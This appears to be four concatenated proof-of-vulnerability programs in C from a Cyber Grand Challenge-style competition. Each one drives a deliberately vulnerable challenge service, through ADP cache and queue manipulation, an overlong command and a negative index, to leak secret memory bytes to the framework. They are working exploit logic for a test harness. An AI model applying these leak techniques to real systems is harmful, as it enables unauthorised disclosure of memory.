int main(void) {
unsigned int type2_addr;
unsigned int type2_size;
unsigned int type2_length;
unsigned char Frame[MAX_FRAME_SIZE];
uint8_t Len;
uint8_t EchoLen;
pL2Hdr pL2 = (pL2Hdr)Frame;
uint8_t i;
// negotiate a Type2 POV with the Competition Framework
NegotiateType2Pov(&type2_addr, &type2_size, &type2_length);
// send a normally routed packet to build the L2 CAM tables in cb_switch
bzero(Frame, MAX_FRAME_SIZE);
BuildL4Segment(ECHO_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame);
BuildL3Packet(0x0a010202, 0x0a010102, Frame);
EchoLen = BuildL2Frame(0x0001, 0x1000, 0, Frame);
SendBytes(STDOUT, Frame, EchoLen);
// receive the ADP request that the router will generate when trying
// to send back the echo response packet
bzero(Frame, MAX_FRAME_SIZE);
ReadBytes(STDIN, Frame, 19);
// answer the ADP request
bzero(Frame, MAX_FRAME_SIZE);
Len = BuildAdpResponse(0x0a010102, 0x1000, 0x0001, 0x1000, 0, Frame);
SendBytes(STDOUT, Frame, Len);
// read the echo response
bzero(Frame, MAX_FRAME_SIZE);
ReadBytes(STDIN, Frame, EchoLen);
for (i = 0; i < 4; i++) {
// send a pwdgen request to cb_3 bypassing the router
// use src L2 addr with 00 for last two bits
bzero(Frame, MAX_FRAME_SIZE);
BuildL4Segment(PWDGEN_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame);
BuildL3Packet(0x0a010202, 0x0a010102, Frame);
Len = BuildL2Frame(0xaaaa, 0x1000+i, 2, Frame);
SendBytes(STDOUT, Frame, Len);
// receive the pwdgen response
// read in the L2hdr first
ReadBytes(STDIN, Frame, L2_HDR_LEN);
// read in the rest of the Frame
ReadBytes(STDIN, Frame+L2_HDR_LEN, pL2->Len);
// Parse the pwdgen response
ParsePwdgenResponse(Frame, 4+i);
}
// send the recovered page bytes to the competition framework
SendBytes(FRAMEWORK, decoded_magic_page+4, 4);
}
int main(void)
{
// ipmask -- mask of CB/RB instruction pointer
// regmask -- mask of CB/RB register (specified by third argument)
// 0 - eax, 1 - ecx, 2 - edx, 3 - ebx, 4 - esp, 5 - ebp, 6 - esi, 7 - edi
// Negotiate type2 -- populate t2vals
unsigned char *read_data = NULL;
unsigned int read_len = 0;
int read_res;
int i;
unsigned char same_line_delimiter[] = ": ";
unsigned char new_line_delimiter[] = "\n";
unsigned int type2_addr;
unsigned int type2_size;
unsigned int type2_length;
NegotiateType2Pov( &type2_addr, &type2_size, &type2_length );
// Read command count
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "3\n" );
// Read source ID
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "0\n" );
// Read Dest ID
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "19\n" );
// Read 13 lines
for ( i = 0; i < 13; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
SendCommand( "7\n" );
// Read 2 lines
for ( i = 0; i < 2; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
SendCommand( "25\n" );
// Now send TCM enable command
// Get source ID
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "0\n" );
// Get Dest ID
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "20\n" );
// Read 13 lines
for ( i = 0; i < 13; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
SendCommand( "11\n" );
// Read 2 lines
for ( i = 0; i < 2; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
// 125 milliseconds
SendCommand( "125\n" );
// Read send binary message
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
// Send TCM start command
SendCommand( "03010001\n" );
// Read Enter Source ID
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "0\n" );
// Read Dest ID
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
SendCommand( "20\n" );
// Read 13 lines
for ( i = 0; i < 13; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
SendCommand( "11\n" );
// Read 2 lines
for ( i = 0; i < 2; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
SendCommand( "225\n" );
// Read enter binary message
read_res = delimited_read( 0, &read_data, &read_len, same_line_delimiter, 2 );
// Send cgc_read wheel speed command -- exceed the length and cgc_read the equipment ID -- it should leak 64-bits or 8-bytes of data
SendCommand( "010600010406070809\n" );
// Consume 13 lines...
for ( i = 0; i < 13; i++ )
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
const char *szExpectLine = "[MESSAGE][SRC=20][DEST=0][LENGTH=13]\n";
if ( read_len != cgc_strlen(szExpectLine) )
{
char *szBlah = "0000";
SendBytes( 3, (char *)szBlah, 4 );
_terminate(-1);
}
if ( memcmp( read_data, szExpectLine, read_len ) != 0 )
_terminate(-1);
// Next line has equipment ID -- which is type 2 memory leak
read_res = delimited_read( 0, &read_data, &read_len, new_line_delimiter, 1 );
if ( read_len < 26 )
_terminate(-1);
else
{
// Convert
uint8_t pov2_data[8];
size_t pos_source = 10;
size_t count = 0;
size_t out_pos = 0;
for ( count = 0; count < 8; count++ )
{
pov2_data[out_pos] = 0;
if ( !IsHexChar( read_data[pos_source] ) )
_terminate(-1);
pov2_data[out_pos] = (HexCharToInt( read_data[pos_source] ) << 4);
pos_source++;
if ( !IsHexChar( read_data[pos_source] ) )
_terminate(-1);
pov2_data[out_pos] |= (HexCharToInt( read_data[pos_source] ));
out_pos++;
pos_source++;
}
SendBytes( 3, (char *)pov2_data, 4 );
}
}
int main(void) {
unsigned int type2_addr;
unsigned int type2_size;
unsigned int type2_length;
unsigned char Frame[MAX_FRAME_SIZE];
uint8_t Len;
uint8_t EchoLen;
pL2Hdr pL2 = (pL2Hdr)Frame;
uint8_t i;
fd_set readfds;
int readyfds;
struct timeval timeout;
unsigned char *magic_bytes;
// negotiate a Type2 POV with the Competition Framework
NegotiateType2Pov(&type2_addr, &type2_size, &type2_length);
// force the pov to sleep letting the router and cb_3 processes
// exchange their echo packets so that SendQueue[0] has the desired
// Frame data
FD_ZERO(&readfds);
FD_SET(STDIN, &readfds);
timeout.tv_sec = 2;
timeout.tv_usec = 0;
fdwait(STDIN+1, &readfds, NULL, &timeout, NULL);
// send 13 gratuitous ADP packets for different L3Addr's
uint32_t L3Addr = 0x0a010110;
for (i = 0; i < 13; i++, L3Addr++) {
bzero(Frame, MAX_FRAME_SIZE);
Len = BuildAdpResponse(L3Addr, 0x1001, 0x0001, 0x1000, 0, Frame);
SendBytes(STDOUT, Frame, Len);
}
// send one more ADP which will overwrite SendQueue[0]
//
// the L3addr of the ADP header should point to a L3Addr that
// has been previously populated in the router's ADP cache
//
// the L2Addr of the ADP header should overwrite the 1-byte Valid
// with a non-zero value and the 1-byte Age field with 0xfe.
bzero(Frame, MAX_FRAME_SIZE);
Len = BuildAdpResponse(0x0a010102, 0x0001, 0x0001, 0x1000, 0, Frame);
// ^ ^
// Age| |Valid
SendBytes(STDOUT, Frame, Len);
// Send enough packets to the original L3Addr we populated in the router's
// ADP to cause it to age out.
// The router will forward it back to VLAN 1, but to an unknown unicast L2Addr
// so the switch will drop it
for (i = 0; i < 8; i++) {
bzero(Frame, MAX_FRAME_SIZE);
BuildL4Segment(ECHO_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame);
BuildL3Packet(L3Addr-1, 0x0a010102, Frame);
EchoLen = BuildL2Frame(0x0001, 0x1000, 0, Frame);
SendBytes(STDOUT, Frame, EchoLen);
}
// Finally, create ADP entry for the addr we over-wrote
// allowing the queued packet to be sent
bzero(Frame, MAX_FRAME_SIZE);
Len = BuildAdpResponse(0x0a010102, 0x1000, 0x0001, 0x1000, 0, Frame);
SendBytes(STDOUT, Frame, Len);
// cgc_read in the ADP frame that'll be sent before the target frame
bzero(Frame, MAX_FRAME_SIZE);
ReadBytes(STDIN, Frame, sizeof(L2Hdr)+sizeof(L2Adjacency)+4);
// see if we have a packet to cgc_read
FD_ZERO(&readfds);
FD_SET(STDIN, &readfds);
timeout.tv_sec = 2;
timeout.tv_usec = 0;
if (fdwait(STDIN+1, &readfds, NULL, &timeout, &readyfds) != 0) {
SendBytes(STDOUT, (unsigned char *)"diedie!", 7);
bzero(Frame, MAX_FRAME_SIZE);
SendBytes(FRAMEWORK, Frame, 4);
_terminate(0);
}
if (readyfds == 0) {
SendBytes(STDOUT, (unsigned char *)"diedie!", 7);
bzero(Frame, MAX_FRAME_SIZE);
SendBytes(FRAMEWORK, Frame, 4);
_terminate(0);
}
// cgc_read the forwarded frame
bzero(Frame, MAX_FRAME_SIZE);
ReadBytes(STDIN, Frame, sizeof(L2Hdr)+sizeof(L3Hdr)+sizeof(L4Hdr)+4+4);
// send the recovered page bytes to the competition framework
magic_bytes = Frame+sizeof(L2Hdr)+sizeof(L3Hdr)+sizeof(L4Hdr);
SendBytes(FRAMEWORK, magic_bytes, 4);
}
int main(void) {
unsigned int type2_addr = 0;
unsigned int type2_size = 0;
unsigned int type2_length = 0;
char buf[5000];
char secret_buf[100];
unsigned int i;
unsigned int index = 0;
unsigned int found = 0;
char out[21];
for ( i = 0; i < 100; i++) {
secret_buf[i] = '\x00';
}
// negotiate a Type2 POV with the Competition Framework
NegotiateType2Pov(&type2_addr, &type2_size, &type2_length);
/// Read main menu
ReadUntilString( 0, "-> ", buf, 500);
SendString(0, "2\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "a\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "b\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "c\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "d\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "e\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "f\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "gggggggggggggg\n");
ReadUntilString( 0, "-> ", buf, 500);
addpantry( "hhhhhhhhhhhhhh\n");
ReadUntilString( 0, "-> ", buf, 500);
SendString(0, "6\n");
ReadUntilString( 0, "-> ", buf, 500);
SendString(0, "1\n");
ReadUntilString( 0, "-> ", buf, 500);
found = 0;
while ( !found ) {
// Print single name
SendString(0, "5\n");
ReadUntilString( 0, ": ", buf, 500);
SendString(0, "-103\n");
ReadBytes( 0, buf, 13);
ReadBytes( 0, buf, 10);
index = -1;
// Check that the cgc_read worked and that there wasn't a null
for ( i = 0; i < 4; i++) {
/// If the value is "\n1" then assume that the cgc_read failed
if ( buf[i] == 0x0a && buf[i+1] == '1') {
index = i;
break;
}
}
/// Delete the offending pantry and add it back
if ( index != -1 ) {
redo();
} else {
// send the bytes to the competition framework
SendBytes(3, (char*)(buf), 4);
found = 1;
}
}
_terminate( 0 );
}
